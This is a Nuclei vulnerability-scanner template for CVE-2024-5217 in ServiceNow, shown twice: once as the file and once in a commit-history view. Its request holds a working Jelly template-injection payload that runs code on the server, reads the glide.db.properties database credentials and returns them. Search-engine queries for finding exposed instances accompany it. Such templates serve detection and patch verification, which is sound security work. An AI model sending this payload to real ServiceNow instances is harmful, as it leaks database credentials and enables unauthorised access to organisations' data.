nuclei-templates/http/cves/2024/CVE-2024-5217.yaml

id: CVE-2024-5217

info:
  name: ServiceNow - Incomplete Input Validation
  author: DhiyaneshDk,ritikchaddha
  severity: critical
  description: |
    ServiceNow has addressed an input validation vulnerability that was identified in the Washington DC, Vancouver, and earlier Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. The vulnerability is addressed in the listed patches and hot fixes below, which were released during the June 2024 patching cycle. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.
  reference:
    - https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data
    - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1644293
    - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1648313
    - https://nvd.nist.gov/vuln/detail/CVE-2024-5217
  metadata:
    verified: true
    max-request: 1
    vendor: servicenow
    product: servicenow
    shodan-query:
      - http.favicon.hash:"1701804003"
      - http.title:"servicenow"
    fofa-query:
      - icon_hash=1701804003
      - title="servicenow"
    google-query: intitle:"servicenow"
  tags: cve,cve2024,servicenow,rce,kev

http:
  - raw:
      - |
        GET /login.do?jvar_page_title=<style><j:jelly+xmlns:j="jelly:core"+xmlns:g='glide'><g:evaluate>z=new+Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new+SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style> HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "glide.db.user"

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e9515b4d468ac0501a40f645a76cff084bacf0ee929360cd16286bf146247503022060a8edc9206f1547392f6b47b16ae55c45598df04944010c30eb5cc0107a83ae:922c64590222798bb761d5b6d8e72950
-												minor-update
											
										
										
											2024-07-11 09:54:04 +00:00
+								id: CVE-2024-5217
-												Create servicenow-filesystem-bypass.yaml
											
										
										
											2024-07-11 06:48:03 +00:00
 								info:
-												Update CVE-2024-5217.yaml
											
										
										
											2024-07-15 04:41:27 +00:00
+								  name: ServiceNow - Incomplete Input Validation
-												minor-update
											
										
										
											2024-07-11 09:54:04 +00:00
+								  author: DhiyaneshDk,ritikchaddha
 								  severity: critical
 								  description: |
 								    ServiceNow has addressed an input validation vulnerability that was identified in the Washington DC, Vancouver, and earlier Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. The vulnerability is addressed in the listed patches and hot fixes below, which were released during the June 2024 patching cycle. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.
-												minor-update
											
										
										
											2024-07-11 07:13:50 +00:00
+								  reference:
 								    - https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data
-												minor-update
											
										
										
											2024-07-11 09:54:04 +00:00
+								    - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1644293
 								    - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1648313
-												Update CVE-2024-5217.yaml
											
										
										
											2024-07-15 04:41:27 +00:00
+								    - https://nvd.nist.gov/vuln/detail/CVE-2024-5217
-												minor-update
											
										
										
											2024-07-11 07:13:50 +00:00
+								  metadata:
 								    verified: true
 								    max-request: 1
 								    vendor: servicenow
 								    product: servicenow
 								    shodan-query:
-												minor-update
											
										
										
											2024-07-11 09:54:04 +00:00
+								      - http.favicon.hash:"1701804003"
-												minor-update
											
										
										
											2024-07-11 07:13:50 +00:00
+								      - http.title:"servicenow"
 								    fofa-query:
 								      - icon_hash=1701804003
 								      - title="servicenow"
 								    google-query: intitle:"servicenow"
-												Update CVE-2024-5217.yaml
											
										
										
											2024-07-30 02:56:28 +00:00
+								  tags: cve,cve2024,servicenow,rce,kev
-												Create servicenow-filesystem-bypass.yaml
											
										
										
											2024-07-11 06:48:03 +00:00
 								http:
 								  - raw:
 								      - |
-												minor-update
											
										
										
											2024-07-11 07:13:50 +00:00
+								        GET /login.do?jvar_page_title=<style><j:jelly+xmlns:j="jelly:core"+xmlns:g='glide'><g:evaluate>z=new+Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new+SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style> HTTP/1.1
-												Create servicenow-filesystem-bypass.yaml
											
										
										
											2024-07-11 06:48:03 +00:00
+								        Host: {{Hostname}}
-												fix-trail-space
											
										
										
											2024-07-11 07:18:08 +00:00
-												Create servicenow-filesystem-bypass.yaml
											
										
										
											2024-07-11 06:48:03 +00:00
+								    matchers-condition: and
 								    matchers:
 								      - type: word
 								        part: body
 								        words:
-												minor-update
											
										
										
											2024-07-11 07:13:50 +00:00
+								          - "glide.db.user"
 								      - type: word
 								        part: header
 								        words:
 								          - 'text/html'
 								      - type: status
 								        status:
 								          - 200
-												Auto Template Signing [Tue Jul 30 07:31:53 UTC 2024] :robot:

											
										
										
											2024-07-30 07:31:53 +00:00
+								# digest: 4a0a00473045022100e9515b4d468ac0501a40f645a76cff084bacf0ee929360cd16286bf146247503022060a8edc9206f1547392f6b47b16ae55c45598df04944010c30eb5cc0107a83ae:922c64590222798bb761d5b6d8e72950